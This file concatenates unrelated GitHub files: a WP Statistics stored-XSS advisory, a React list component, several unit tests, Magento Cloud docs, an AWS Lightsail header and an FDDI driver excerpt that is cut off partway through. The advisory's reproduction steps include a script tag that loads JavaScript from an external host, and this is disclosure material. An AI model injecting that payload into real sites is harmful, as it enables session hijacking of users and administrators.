* Severity: Medium
* Version Affected: 9.1.2 and mostly prior to it
* Version Tested : 9.1.2
* version patched: 9.1.3
Description
===========
Vulnerable Parameter
--------------------
* Check for online users every:
* Coefficient per visitor:
About Vulnerability
-------------------
This plugin is vulnerable to a Stored cross site scripting vulnerability,This issue was exploited when administrator users with access to WP Statistics Setting in wordpress Above Vulbnerable parameter is vulnerable for stored XSS. A malicious administration can hijack other users session, take control of another administrator's browser or install malware on their computer.
Vulnerability Class
===================
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)
Steps to Reproduce: (POC)
=========================
After installing the plugin
* Goto settings --> WP Statistics
* Put This payload in any above vulnerable parameter <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
* Click on the Save Changes you will see XSS in action
* Reload the page or re navigate to page to make sure its stored ;)
Mitigation
==========
Update to 9.1.3
Change Log
==========
https://wordpress.org/plugins/wp-statistics/changelog/
Disclosure
==========
14-April-2015 reported to developer
15-April-2015 Fix by developer
15-April-2015 Public Disclosure
credits
=======
* Kaustubh Padwad
* Information Security Researcher
* [email protected]
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad
| {
"pile_set_name": "Github"
} |
// @flow
import React, { PropTypes } from 'react';
import debounce from 'lodash.debounce';
import { List } from './List';
import { TextInput } from './forms/TextInput';
type Props = {
className?: string,
children?: ReactChildren,
style: Object,
data?: Array<Object>,
labelFunction?: Function,
disabled?: boolean,
keyFunction?: Function,
defaultStyles?: boolean,
defaultSelection?: Object,
onItemSelect?: Function,
listStyle: Object,
filterFunction: Function,
placeholder: string,
emptyText: string,
};
type State = {
text?: string,
};
function defaultFilterFunction(text, item) {
return item && item.toString().indexOf(text) >= 0;
}
/**
* Control that displays a List of items and allows for selection.
* Includes a text field above for quick filtering of items in the list.
* Provide a filterFunction that determines whether item should be displayed with text.
* See "List" component for more details.
*
* @property {string} className additional "class" to add to outermost element (alongside "FilterableList")
* @property {array} children React children
* @property {Object} style React style object to be applied to outer element.
* @property {array} [data] data to render in the list.
* @property {Function} [labelFunction] converts each object to a string in the default renderer.
* @property {Function} [keyFunction]
* @property {boolean} [defaultStyles] set "false" to remove all default styling from the List.
* @property {Object} [defaultSelection] item to select in the list by default
* @property {Function} [onItemSelect] callback when an item is selected, receiving listIndex and listItem.
*
* @property {Object} listStyle React style object to be applied to child List.
* @property {Function} filterFunction receives text, item; return true/false to show each item
* @property {string} placeholder text to display in filter input when empty
* @property {string} emptyText text to display when no matches occur
*/
export class FilterableList extends React.Component {
props: Props;
state: State;
static defaultProps: Props = {
style: {},
listStyle: {},
filterFunction: defaultFilterFunction,
placeholder: 'Search...',
emptyText: 'No matches.',
};
constructor(props: Props) {
super(props);
this.state = {};
}
_onFilterChange = debounce(text => {
this.setState({
text,
});
}, 250);
render() {
// passthrough props for List
const { keyFunction, labelFunction, listStyle, defaultStyles, defaultSelection, onItemSelect } = this.props;
const { data, disabled, emptyText, filterFunction, placeholder, style } = this.props;
const { text } = this.state;
const filtered = data ? data.filter(item => !text || filterFunction(text, item)) : [];
const noMatches = text && filtered.length === 0;
const listProps = {
labelFunction,
keyFunction,
defaultStyles,
defaultSelection,
onItemSelect,
};
const outerClass = this.props.className || '';
return (
<div className={`FilterableList ${outerClass}`} style={style}>
<TextInput placeholder={placeholder} disabled={disabled} onChange={text => this._onFilterChange(text)} iconLeft="ActionSearch" />
{noMatches && emptyText && <div className="FilterableList-empty-text">{emptyText}</div>}
{!noMatches && (
<List {...listProps} disabled={disabled} className="FilterableList-List" data={filtered} style={listStyle}>
{this.props.children}
</List>
)}
</div>
);
}
}
FilterableList.propTypes = {
// from List
className: PropTypes.string,
children: PropTypes.element,
style: PropTypes.object,
data: PropTypes.array,
disabled: PropTypes.bool,
labelFunction: PropTypes.func,
keyFunction: PropTypes.func,
defaultStyles: PropTypes.bool,
defaultSelection: PropTypes.any,
onItemSelect: PropTypes.func,
// for FilterableList
listStyle: PropTypes.object,
filterFunction: PropTypes.func,
placeholder: PropTypes.string,
emptyText: PropTypes.string,
};
| {
"pile_set_name": "Github"
} |
using Xunit;
using System.Linq;
namespace RDotNet
{
public class REngineCleanupTest : RDotNetTestFixture
{
[Fact]
public void TestDefaultClearGlobalEnv()
{
SetUpTest();
var engine = this.Engine;
engine.ClearGlobalEnvironment();
var s = engine.Evaluate("ls()").AsCharacter().ToArray();
Assert.True(s.Length == 0);
}
[Fact]
public void TestDetachPackagesDefault()
{
SetUpTest();
var engine = this.Engine;
var s = engine.Evaluate("search()").AsCharacter().ToArray();
Assert.False(s.Contains("package:lattice"));
Assert.False(s.Contains("package:Matrix"));
Assert.False(s.Contains("package:MASS"));
Assert.False(s.Contains("biopsy"));
engine.ClearGlobalEnvironment();
engine.Evaluate("library(lattice)");
engine.Evaluate("library(Matrix)");
engine.Evaluate("library(MASS)");
engine.Evaluate("data(biopsy, package='MASS')");
engine.Evaluate("attach(biopsy)");
s = engine.Evaluate("search()").AsCharacter().ToArray();
Assert.True(s.Contains("package:lattice"));
Assert.True(s.Contains("package:Matrix"));
Assert.True(s.Contains("package:MASS"));
Assert.True(s.Contains("biopsy"));
engine.ClearGlobalEnvironment(detachPackages: true);
s = engine.Evaluate("search()").AsCharacter().ToArray();
Assert.False(s.Contains("package:lattice"));
Assert.False(s.Contains("package:Matrix"));
Assert.False(s.Contains("package:MASS"));
Assert.False(s.Contains("biopsy"));
}
}
} | {
"pile_set_name": "Github"
} |
"""Test file."""
import imp
import platform
from os import path
from unittest import TestCase
from EasyClangComplete.plugin.utils import file
from EasyClangComplete.plugin.utils import search_scope
imp.reload(file)
imp.reload(search_scope)
File = file.File
SearchScope = search_scope.TreeSearchScope
class test_file(TestCase):
"""Testing file related stuff."""
def test_find_file(self):
"""Test if we can find a file."""
current_folder = path.dirname(path.abspath(__file__))
parent_folder = path.dirname(current_folder)
search_scope = SearchScope(from_folder=current_folder,
to_folder=parent_folder)
file = File.search(
file_name='README.md',
search_scope=search_scope)
expected = path.join(parent_folder, 'README.md')
self.assertIsNotNone(file)
self.assertTrue(file.loaded())
self.assertEqual(file.full_path, expected)
def test_find_file_content_string(self):
"""Test if we can find a file."""
current_folder = path.dirname(path.abspath(__file__))
parent_folder = path.dirname(current_folder)
search_scope = SearchScope(from_folder=current_folder,
to_folder=parent_folder)
file = File.search(
file_name='README.md',
search_scope=search_scope,
search_content='plugin')
self.assertIsNotNone(file)
self.assertTrue(file.loaded())
expected = path.join(parent_folder, 'README.md')
self.assertEqual(file.full_path, expected)
file_fail = File.search(
file_name='README.md',
search_scope=search_scope,
search_content='text that is not in the file')
self.assertIsNone(file_fail)
def test_find_file_content_list(self):
"""Test if we can find a file."""
current_folder = path.dirname(path.abspath(__file__))
parent_folder = path.dirname(current_folder)
search_scope = SearchScope(from_folder=current_folder,
to_folder=parent_folder)
file = File.search(
file_name='README.md',
search_scope=search_scope,
search_content=['non existing text', 'plugin'])
self.assertIsNotNone(file)
self.assertTrue(file.loaded())
expected = path.join(parent_folder, 'README.md')
self.assertEqual(file.full_path, expected)
file_fail = File.search(
file_name='README.md',
search_scope=search_scope,
search_content=['non existing text'])
self.assertIsNone(file_fail)
def test_canonical_path(self):
"""Test creating canonical path."""
if platform.system() == "Windows":
original_path = "../hello/world.txt"
folder = "D:\\folder"
res = File.canonical_path(original_path, folder)
self.assertEqual(res, "D:\\hello\\world.txt")
else:
original_path = "../hello/world.txt"
folder = "/folder"
res = File.canonical_path(original_path, folder)
self.assertEqual(res, "/hello/world.txt")
def test_canonical_path_absolute(self):
"""Test creating canonical path."""
if platform.system() == "Windows":
original_path = "D:\\hello\\world.txt"
res = File.canonical_path(original_path)
self.assertEqual(res, "D:\\hello\\world.txt")
else:
original_path = "/hello/world.txt"
res = File.canonical_path(original_path)
self.assertEqual(res, "/hello/world.txt")
def test_canonical_path_empty(self):
"""Test failing for canonical path."""
original_path = None
res = File.canonical_path(original_path)
self.assertIsNone(res)
def test_temp_dir(self):
"""Test that we can expand star in path."""
temp_folder = File.get_temp_dir()
self.assertTrue(path.exists(temp_folder))
def test_ignore(self):
"""Test ignoring glob patterns."""
self.assertTrue(File.is_ignored('/tmp/hello', ['/tmp/*']))
self.assertTrue(File.is_ignored('/tmp/hello', ['/tmp*']))
self.assertTrue(File.is_ignored('/tmp/hello', ['', '/tmp*']))
self.assertTrue(File.is_ignored('/tmp/hello', ['', '/tmp/hell*']))
self.assertTrue(File.is_ignored('/tmp/hello/world', ['/tmp/*']))
self.assertFalse(File.is_ignored('/tmp/hello', ['/tmp/c*']))
def test_expand_all(self):
"""Test the globbing and wildcard expansion."""
current_dir_glob = path.join(path.dirname(__file__), '*')
result = File.expand_all(current_dir_glob)
self.assertIn(__file__, result)
result = File.expand_all(current_dir_glob, expand_globbing=False)
self.assertEquals(len(result), 1)
self.assertIn(current_dir_glob, result)
path_with_wildcard = "hello$world"
wildcards = {"world": "BLAH"}
result = File.expand_all(path_with_wildcard, wildcard_values=wildcards)
self.assertEquals(len(result), 1)
self.assertIn("helloBLAH", result)
| {
"pile_set_name": "Github"
} |
---
group: cloud-guide
title: Environment variables
functional_areas:
- Cloud
- Configuration
---
{{site.data.var.ece}} enables you to assign environment variables to override configuration options:
- [ADMIN]({{ site.baseurl }}/cloud/env/environment-vars_magento.html)—variables override project ADMIN variables
- [Global]({{ site.baseurl }}/cloud/env/variables-global.html)—variables affect each stage
- [Build]({{ site.baseurl }}/cloud/env/variables-build.html)—variables control build actions
- [Cloud]({{ site.baseurl }}/cloud/env/variables-cloud.html)—variables specific to {{site.data.var.ece}}
- [Deploy]({{ site.baseurl }}/cloud/env/variables-deploy.html)—variables control deploy actions
- [Post-deploy]({{ site.baseurl }}/cloud/env/variables-post-deploy.html)—variables control actions after deploy
Variables are _hierarchical_, which means that if a variable is not overridden, it is inherited from the parent environment.
You can set [ADMIN variables]({{ site.baseurl }}/cloud/env/environment-vars_magento.html) from the Project Web interface or using the Magento CLI. You can manage other environment variables from the [`.magento.env.yaml`]({{ site.baseurl }}/cloud/project/magento-env-yaml.html) file to manage build and deploy actions across all of your environments—including Pro Staging and Production—without requiring a support ticket. | {
"pile_set_name": "Github"
} |
/**
* Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
* SPDX-License-Identifier: Apache-2.0.
*/
#pragma once
#include <aws/lightsail/Lightsail_EXPORTS.h>
#include <aws/lightsail/LightsailRequest.h>
#include <aws/core/utils/memory/stl/AWSString.h>
#include <utility>
namespace Aws
{
namespace Lightsail
{
namespace Model
{
/**
*/
class AWS_LIGHTSAIL_API GetBlueprintsRequest : public LightsailRequest
{
public:
GetBlueprintsRequest();
// Service request name is the Operation name which will send this request out,
// each operation should has unique request name, so that we can get operation's name from this request.
// Note: this is not true for response, multiple operations may have the same response name,
// so we can not get operation's name from response.
inline virtual const char* GetServiceRequestName() const override { return "GetBlueprints"; }
Aws::String SerializePayload() const override;
Aws::Http::HeaderValueCollection GetRequestSpecificHeaders() const override;
/**
* <p>A Boolean value indicating whether to include inactive results in your
* request.</p>
*/
inline bool GetIncludeInactive() const{ return m_includeInactive; }
/**
* <p>A Boolean value indicating whether to include inactive results in your
* request.</p>
*/
inline bool IncludeInactiveHasBeenSet() const { return m_includeInactiveHasBeenSet; }
/**
* <p>A Boolean value indicating whether to include inactive results in your
* request.</p>
*/
inline void SetIncludeInactive(bool value) { m_includeInactiveHasBeenSet = true; m_includeInactive = value; }
/**
* <p>A Boolean value indicating whether to include inactive results in your
* request.</p>
*/
inline GetBlueprintsRequest& WithIncludeInactive(bool value) { SetIncludeInactive(value); return *this;}
/**
* <p>The token to advance to the next page of results from your request.</p> <p>To
* get a page token, perform an initial <code>GetBlueprints</code> request. If your
* results are paginated, the response will return a next page token that you can
* specify as the page token in a subsequent request.</p>
*/
inline const Aws::String& GetPageToken() const{ return m_pageToken; }
/**
* <p>The token to advance to the next page of results from your request.</p> <p>To
* get a page token, perform an initial <code>GetBlueprints</code> request. If your
* results are paginated, the response will return a next page token that you can
* specify as the page token in a subsequent request.</p>
*/
inline bool PageTokenHasBeenSet() const { return m_pageTokenHasBeenSet; }
/**
* <p>The token to advance to the next page of results from your request.</p> <p>To
* get a page token, perform an initial <code>GetBlueprints</code> request. If your
* results are paginated, the response will return a next page token that you can
* specify as the page token in a subsequent request.</p>
*/
inline void SetPageToken(const Aws::String& value) { m_pageTokenHasBeenSet = true; m_pageToken = value; }
/**
* <p>The token to advance to the next page of results from your request.</p> <p>To
* get a page token, perform an initial <code>GetBlueprints</code> request. If your
* results are paginated, the response will return a next page token that you can
* specify as the page token in a subsequent request.</p>
*/
inline void SetPageToken(Aws::String&& value) { m_pageTokenHasBeenSet = true; m_pageToken = std::move(value); }
/**
* <p>The token to advance to the next page of results from your request.</p> <p>To
* get a page token, perform an initial <code>GetBlueprints</code> request. If your
* results are paginated, the response will return a next page token that you can
* specify as the page token in a subsequent request.</p>
*/
inline void SetPageToken(const char* value) { m_pageTokenHasBeenSet = true; m_pageToken.assign(value); }
/**
* <p>The token to advance to the next page of results from your request.</p> <p>To
* get a page token, perform an initial <code>GetBlueprints</code> request. If your
* results are paginated, the response will return a next page token that you can
* specify as the page token in a subsequent request.</p>
*/
inline GetBlueprintsRequest& WithPageToken(const Aws::String& value) { SetPageToken(value); return *this;}
/**
* <p>The token to advance to the next page of results from your request.</p> <p>To
* get a page token, perform an initial <code>GetBlueprints</code> request. If your
* results are paginated, the response will return a next page token that you can
* specify as the page token in a subsequent request.</p>
*/
inline GetBlueprintsRequest& WithPageToken(Aws::String&& value) { SetPageToken(std::move(value)); return *this;}
/**
* <p>The token to advance to the next page of results from your request.</p> <p>To
* get a page token, perform an initial <code>GetBlueprints</code> request. If your
* results are paginated, the response will return a next page token that you can
* specify as the page token in a subsequent request.</p>
*/
inline GetBlueprintsRequest& WithPageToken(const char* value) { SetPageToken(value); return *this;}
private:
bool m_includeInactive;
bool m_includeInactiveHasBeenSet;
Aws::String m_pageToken;
bool m_pageTokenHasBeenSet;
};
} // namespace Model
} // namespace Lightsail
} // namespace Aws
| {
"pile_set_name": "Github"
} |
/******************************************************************************
*
* (C)Copyright 1998,1999 SysKonnect,
* a business unit of Schneider & Koch & Co. Datensysteme GmbH.
*
* See the file "skfddi.c" for further information.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* The information in this file is provided "AS IS" without warranty.
*
******************************************************************************/
/*
PCM
Physical Connection Management
*/
/*
* Hardware independent state machine implemantation
* The following external SMT functions are referenced :
*
* queue_event()
* smt_timer_start()
* smt_timer_stop()
*
* The following external HW dependent functions are referenced :
* sm_pm_control()
* sm_ph_linestate()
* sm_pm_ls_latch()
*
* The following HW dependent events are required :
* PC_QLS
* PC_ILS
* PC_HLS
* PC_MLS
* PC_NSE
* PC_LEM
*
*/
#include "h/types.h"
#include "h/fddi.h"
#include "h/smc.h"
#include "h/supern_2.h"
#define KERNEL
#include "h/smtstate.h"
#ifndef lint
static const char ID_sccs[] = "@(#)pcmplc.c 2.55 99/08/05 (C) SK " ;
#endif
#ifdef FDDI_MIB
extern int snmp_fddi_trap(
#ifdef ANSIC
struct s_smc * smc, int type, int index
#endif
);
#endif
#ifdef CONCENTRATOR
extern int plc_is_installed(
#ifdef ANSIC
struct s_smc *smc ,
int p
#endif
) ;
#endif
/*
* FSM Macros
*/
#define AFLAG (0x20)
#define GO_STATE(x) (mib->fddiPORTPCMState = (x)|AFLAG)
#define ACTIONS_DONE() (mib->fddiPORTPCMState &= ~AFLAG)
#define ACTIONS(x) (x|AFLAG)
/*
* PCM states
*/
#define PC0_OFF 0
#define PC1_BREAK 1
#define PC2_TRACE 2
#define PC3_CONNECT 3
#define PC4_NEXT 4
#define PC5_SIGNAL 5
#define PC6_JOIN 6
#define PC7_VERIFY 7
#define PC8_ACTIVE 8
#define PC9_MAINT 9
/*
* symbolic state names
*/
static const char * const pcm_states[] = {
"PC0_OFF","PC1_BREAK","PC2_TRACE","PC3_CONNECT","PC4_NEXT",
"PC5_SIGNAL","PC6_JOIN","PC7_VERIFY","PC8_ACTIVE","PC9_MAINT"
} ;
/*
* symbolic event names
*/
static const char * const pcm_events[] = {
"NONE","PC_START","PC_STOP","PC_LOOP","PC_JOIN","PC_SIGNAL",
"PC_REJECT","PC_MAINT","PC_TRACE","PC_PDR",
"PC_ENABLE","PC_DISABLE",
"PC_QLS","PC_ILS","PC_MLS","PC_HLS","PC_LS_PDR","PC_LS_NONE",
"PC_TIMEOUT_TB_MAX","PC_TIMEOUT_TB_MIN",
"PC_TIMEOUT_C_MIN","PC_TIMEOUT_T_OUT",
"PC_TIMEOUT_TL_MIN","PC_TIMEOUT_T_NEXT","PC_TIMEOUT_LCT",
"PC_NSE","PC_LEM"
} ;
#ifdef MOT_ELM
/*
* PCL-S control register
* this register in the PLC-S controls the scrambling parameters
*/
#define PLCS_CONTROL_C_U 0
#define PLCS_CONTROL_C_S (PL_C_SDOFF_ENABLE | PL_C_SDON_ENABLE | \
PL_C_CIPHER_ENABLE)
#define PLCS_FASSERT_U 0
#define PLCS_FASSERT_S 0xFd76 /* 52.0 us */
#define PLCS_FDEASSERT_U 0
#define PLCS_FDEASSERT_S 0
#else /* nMOT_ELM */
/*
* PCL-S control register
* this register in the PLC-S controls the scrambling parameters
* can be patched for ANSI compliance if standard changes
*/
static const u_char plcs_control_c_u[17] = "PLC_CNTRL_C_U=\0\0" ;
static const u_char plcs_control_c_s[17] = "PLC_CNTRL_C_S=\01\02" ;
#define PLCS_CONTROL_C_U (plcs_control_c_u[14] | (plcs_control_c_u[15]<<8))
#define PLCS_CONTROL_C_S (plcs_control_c_s[14] | (plcs_control_c_s[15]<<8))
#endif /* nMOT_ELM */
/*
* external vars
*/
/* struct definition see 'cmtdef.h' (also used by CFM) */
#define PS_OFF 0
#define PS_BIT3 1
#define PS_BIT4 2
#define PS_BIT7 3
#define PS_LCT 4
#define PS_BIT8 5
#define PS_JOIN 6
#define PS_ACTIVE 7
#define LCT_LEM_MAX 255
/*
* PLC timing parameter
*/
#define PLC_MS(m) ((int)((0x10000L-(m*100000L/2048))))
#define SLOW_TL_MIN PLC_MS(6)
#define SLOW_C_MIN PLC_MS(10)
static const struct plt {
int timer ; /* relative plc timer address */
int para ; /* default timing parameters */
} pltm[] = {
{ PL_C_MIN, SLOW_C_MIN }, /* min t. to remain Connect State */
{ PL_TL_MIN, SLOW_TL_MIN }, /* min t. to transmit a Line State */
{ PL_TB_MIN, TP_TB_MIN }, /* min break time */
{ PL_T_OUT, TP_T_OUT }, /* Signaling timeout */
{ PL_LC_LENGTH, TP_LC_LENGTH }, /* Link Confidence Test Time */
{ PL_T_SCRUB, TP_T_SCRUB }, /* Scrub Time == MAC TVX time ! */
{ PL_NS_MAX, TP_NS_MAX }, /* max t. that noise is tolerated */
{ 0,0 }
} ;
/*
* interrupt mask
*/
#ifdef SUPERNET_3
/*
* Do we need the EBUF error during signaling, too, to detect SUPERNET_3
* PLL bug?
*/
static const int plc_imsk_na = PL_PCM_CODE | PL_TRACE_PROP | PL_PCM_BREAK |
PL_PCM_ENABLED | PL_SELF_TEST | PL_EBUF_ERR;
#else /* SUPERNET_3 */
/*
* We do NOT need the elasticity buffer error during signaling.
*/
static int plc_imsk_na = PL_PCM_CODE | PL_TRACE_PROP | PL_PCM_BREAK |
PL_PCM_ENABLED | PL_SELF_TEST ;
#endif /* SUPERNET_3 */
static const int plc_imsk_act = PL_PCM_CODE | PL_TRACE_PROP | PL_PCM_BREAK |
PL_PCM_ENABLED | PL_SELF_TEST | PL_EBUF_ERR;
/* internal functions */
static void pcm_fsm(struct s_smc *smc, struct s_phy *phy, int cmd);
static void pc_rcode_actions(struct s_smc *smc, int bit, struct s_phy *phy);
static void pc_tcode_actions(struct s_smc *smc, const int bit, struct s_phy *phy);
static void reset_lem_struct(struct s_phy *phy);
static void plc_init(struct s_smc *smc, int p);
static void sm_ph_lem_start(struct s_smc *smc, int np, int threshold);
static void sm_ph_lem_stop(struct s_smc *smc, int np);
static void sm_ph_linestate(struct s_smc *smc, int phy, int ls);
static void real_init_plc(struct s_smc *smc);
/*
* SMT timer interface
* start PCM timer 0
*/
static void start_pcm_timer0(struct s_smc *smc, u_long value, int event,
struct s_phy *phy)
{
phy->timer0_exp = FALSE ; /* clear timer event flag */
smt_timer_start(smc,&phy->pcm_timer0,value,
EV_TOKEN(EVENT_PCM+phy->np,event)) ;
}
/*
* SMT timer interface
* stop PCM timer 0
*/
static void stop_pcm_timer0(struct s_smc *smc, struct s_phy *phy)
{
if (phy->pcm_timer0.tm_active)
smt_timer_stop(smc,&phy->pcm_timer0) ;
}
/*
init PCM state machine (called by driver)
clear all PCM vars and flags
*/
void pcm_init(struct s_smc *smc)
{
int i ;
int np ;
struct s_phy *phy ;
struct fddi_mib_p *mib ;
for (np = 0,phy = smc->y ; np < NUMPHYS ; np++,phy++) {
/* Indicates the type of PHY being used */
mib = phy->mib ;
mib->fddiPORTPCMState = ACTIONS(PC0_OFF) ;
phy->np = np ;
switch (smc->s.sas) {
#ifdef CONCENTRATOR
case SMT_SAS :
mib->fddiPORTMy_Type = (np == PS) ? TS : TM ;
break ;
case SMT_DAS :
mib->fddiPORTMy_Type = (np == PA) ? TA :
(np == PB) ? TB : TM ;
break ;
case SMT_NAC :
mib->fddiPORTMy_Type = TM ;
break;
#else
case SMT_SAS :
mib->fddiPORTMy_Type = (np == PS) ? TS : TNONE ;
mib->fddiPORTHardwarePresent = (np == PS) ? TRUE :
FALSE ;
#ifndef SUPERNET_3
smc->y[PA].mib->fddiPORTPCMState = PC0_OFF ;
#else
smc->y[PB].mib->fddiPORTPCMState = PC0_OFF ;
#endif
break ;
case SMT_DAS :
mib->fddiPORTMy_Type = (np == PB) ? TB : TA ;
break ;
#endif
}
/*
* set PMD-type
*/
phy->pmd_scramble = 0 ;
switch (phy->pmd_type[PMD_SK_PMD]) {
case 'P' :
mib->fddiPORTPMDClass = MIB_PMDCLASS_MULTI ;
break ;
case 'L' :
mib->fddiPORTPMDClass = MIB_PMDCLASS_LCF ;
break ;
case 'D' :
mib->fddiPORTPMDClass = MIB_PMDCLASS_TP ;
break ;
case 'S' :
mib->fddiPORTPMDClass = MIB_PMDCLASS_TP ;
phy->pmd_scramble = TRUE ;
break ;
case 'U' :
mib->fddiPORTPMDClass = MIB_PMDCLASS_TP ;
phy->pmd_scramble = TRUE ;
break ;
case '1' :
mib->fddiPORTPMDClass = MIB_PMDCLASS_SINGLE1 ;
break ;
case '2' :
mib->fddiPORTPMDClass = MIB_PMDCLASS_SINGLE2 ;
break ;
case '3' :
mib->fddiPORTPMDClass = MIB_PMDCLASS_SINGLE2 ;
break ;
case '4' :
mib->fddiPORTPMDClass = MIB_PMDCLASS_SINGLE1 ;
break ;
case 'H' :
mib->fddiPORTPMDClass = MIB_PMDCLASS_UNKNOWN ;
break ;
case 'I' :
mib->fddiPORTPMDClass = MIB_PMDCLASS_TP ;
break ;
case 'G' :
mib->fddiPORTPMDClass = MIB_PMDCLASS_TP ;
break ;
default:
mib->fddiPORTPMDClass = MIB_PMDCLASS_UNKNOWN ;
break ;
}
/*
* A and B port can be on primary and secondary path
*/
switch (mib->fddiPORTMy_Type) {
case TA :
mib->fddiPORTAvailablePaths |= MIB_PATH_S ;
mib->fddiPORTRequestedPaths[1] = MIB_P_PATH_LOCAL ;
mib->fddiPORTRequestedPaths[2] =
MIB_P_PATH_LOCAL |
MIB_P_PATH_CON_ALTER |
MIB_P_PATH_SEC_PREFER ;
mib->fddiPORTRequestedPaths[3] =
MIB_P_PATH_LOCAL |
MIB_P_PATH_CON_ALTER |
MIB_P_PATH_SEC_PREFER |
MIB_P_PATH_THRU ;
break ;
case TB :
mib->fddiPORTAvailablePaths |= MIB_PATH_S ;
mib->fddiPORTRequestedPaths[1] = MIB_P_PATH_LOCAL ;
mib->fddiPORTRequestedPaths[2] =
MIB_P_PATH_LOCAL |
MIB_P_PATH_PRIM_PREFER ;
mib->fddiPORTRequestedPaths[3] =
MIB_P_PATH_LOCAL |
MIB_P_PATH_PRIM_PREFER |
MIB_P_PATH_CON_PREFER |
MIB_P_PATH_THRU ;
break ;
case TS :
mib->fddiPORTAvailablePaths |= MIB_PATH_S ;
mib->fddiPORTRequestedPaths[1] = MIB_P_PATH_LOCAL ;
mib->fddiPORTRequestedPaths[2] =
MIB_P_PATH_LOCAL |
MIB_P_PATH_CON_ALTER |
MIB_P_PATH_PRIM_PREFER ;
mib->fddiPORTRequestedPaths[3] =
MIB_P_PATH_LOCAL |
MIB_P_PATH_CON_ALTER |
MIB_P_PATH_PRIM_PREFER ;
break ;
case TM :
mib->fddiPORTRequestedPaths[1] = MIB_P_PATH_LOCAL ;
mib->fddiPORTRequestedPaths[2] =
MIB_P_PATH_LOCAL |
MIB_P_PATH_SEC_ALTER |
MIB_P_PATH_PRIM_ALTER ;
mib->fddiPORTRequestedPaths[3] = 0 ;
break ;
}
phy->pc_lem_fail = FALSE ;
mib->fddiPORTPCMStateX = mib->fddiPORTPCMState ;
mib->fddiPORTLCTFail_Ct = 0 ;
mib->fddiPORTBS_Flag = 0 ;
mib->fddiPORTCurrentPath = MIB_PATH_ISOLATED ;
mib->fddiPORTNeighborType = TNONE ;
phy->ls_flag = 0 ;
phy->rc_flag = 0 ;
phy->tc_flag = 0 ;
phy->td_flag = 0 ;
if (np >= PM)
phy->phy_name = '0' + np - PM ;
else
phy->phy_name = 'A' + np ;
phy->wc_flag = FALSE ; /* set by SMT */
memset((char *)&phy->lem,0,sizeof(struct lem_counter)) ;
reset_lem_struct(phy) ;
memset((char *)&phy->plc,0,sizeof(struct s_plc)) ;
phy->plc.p_state = PS_OFF ;
for (i = 0 ; i < NUMBITS ; i++) {
phy->t_next[i] = 0 ;
}
}
real_init_plc(smc) ;
}
void init_plc(struct s_smc *smc)
{
SK_UNUSED(smc) ;
/*
* dummy
* this is an obsolete public entry point that has to remain
* for compat. It is used by various drivers.
* the work is now done in real_init_plc()
* which is called from pcm_init() ;
*/
}
static void real_init_plc(struct s_smc *smc)
{
int p ;
for (p = 0 ; p < NUMPHYS ; p++)
plc_init(smc,p) ;
}
static void plc_init(struct s_smc *smc, int p)
{
int i ;
#ifndef MOT_ELM
int rev ; /* Revision of PLC-x */
#endif /* MOT_ELM */
/* transit PCM state machine to MAINT state */
outpw(PLC(p,PL_CNTRL_B),0) ;
outpw(PLC(p,PL_CNTRL_B),PL_PCM_STOP) ;
outpw(PLC(p,PL_CNTRL_A),0) ;
/*
* if PLC-S then set control register C
*/
#ifndef MOT_ELM
rev = inpw(PLC(p,PL_STATUS_A)) & PLC_REV_MASK ;
if (rev != PLC_REVISION_A)
#endif /* MOT_ELM */
{
if (smc->y[p].pmd_scramble) {
outpw(PLC(p,PL_CNTRL_C),PLCS_CONTROL_C_S) ;
#ifdef MOT_ELM
outpw(PLC(p,PL_T_FOT_ASS),PLCS_FASSERT_S) ;
outpw(PLC(p,PL_T_FOT_DEASS),PLCS_FDEASSERT_S) ;
#endif /* MOT_ELM */
}
else {
outpw(PLC(p,PL_CNTRL_C),PLCS_CONTROL_C_U) ;
#ifdef MOT_ELM
outpw(PLC(p,PL_T_FOT_ASS),PLCS_FASSERT_U) ;
outpw(PLC(p,PL_T_FOT_DEASS),PLCS_FDEASSERT_U) ;
#endif /* MOT_ELM */
}
}
/*
* set timer register
*/
for ( i = 0 ; pltm[i].timer; i++) /* set timer parameter reg */
outpw(PLC(p,pltm[i].timer),pltm[i].para) ;
(void)inpw(PLC(p,PL_INTR_EVENT)) ; /* clear interrupt event reg */
plc_clear_irq(smc,p) ;
outpw(PLC(p,PL_INTR_MASK),plc_imsk_na); /* enable non active irq's */
/*
* if PCM is configured for class s, it will NOT go to the
* REMOVE state if offline (page 3-36;)
* in the concentrator, all inactive PHYS always must be in
* the remove state
* there's no real need to use this feature at all ..
*/
#ifndef CONCENTRATOR
if ((smc->s.sas == SMT_SAS) && (p == PS)) {
outpw(PLC(p,PL_CNTRL_B),PL_CLASS_S) ;
}
#endif
}
/*
* control PCM state machine
*/
static void plc_go_state(struct s_smc *smc, int p, int state)
{
HW_PTR port ;
int val ;
SK_UNUSED(smc) ;
port = (HW_PTR) (PLC(p,PL_CNTRL_B)) ;
val = inpw(port) & ~(PL_PCM_CNTRL | PL_MAINT) ;
outpw(port,val) ;
outpw(port,val | state) ;
}
/*
* read current line state (called by ECM & PCM)
*/
int sm_pm_get_ls(struct s_smc *smc, int phy)
{
int state ;
#ifdef CONCENTRATOR
if (!plc_is_installed(smc,phy))
return PC_QLS;
#endif
state = inpw(PLC(phy,PL_STATUS_A)) & PL_LINE_ST ;
switch(state) {
case PL_L_QLS:
state = PC_QLS ;
break ;
case PL_L_MLS:
state = PC_MLS ;
break ;
case PL_L_HLS:
state = PC_HLS ;
break ;
case PL_L_ILS4:
case PL_L_ILS16:
state = PC_ILS ;
break ;
case PL_L_ALS:
state = PC_LS_PDR ;
break ;
default :
state = PC_LS_NONE ;
}
return state;
}
static int plc_send_bits(struct s_smc *smc, struct s_phy *phy, int len)
{
int np = phy->np ; /* PHY index */
int n ;
int i ;
SK_UNUSED(smc) ;
/* create bit vector */
for (i = len-1,n = 0 ; i >= 0 ; i--) {
n = (n<<1) | phy->t_val[phy->bitn+i] ;
}
if (inpw(PLC(np,PL_STATUS_B)) & PL_PCM_SIGNAL) {
#if 0
printf("PL_PCM_SIGNAL is set\n") ;
#endif
return 1;
}
/* write bit[n] & length = 1 to regs */
outpw(PLC(np,PL_VECTOR_LEN),len-1) ; /* len=nr-1 */
